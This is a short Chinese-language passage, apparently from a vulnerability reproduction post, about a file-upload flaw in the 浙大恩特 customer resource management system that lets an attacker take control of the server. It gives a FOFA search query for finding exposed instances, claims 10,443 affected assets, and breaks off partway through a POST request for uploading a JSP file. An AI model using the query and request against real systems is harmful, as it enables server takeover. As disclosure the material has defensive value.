产品简介
杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
漏洞描述
浙大恩特客户资源管理系统存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
资产测绘
Fofa语句:
title=”浙大恩特客户资源管理系统” || body=”script/Ent.base.js”
影响资产数量:
10,443
漏洞复现
第一步上传jsp文件,查看返回路径
POST /entsoft/MailAction.entphone;.js?act=AppUpload&bodyI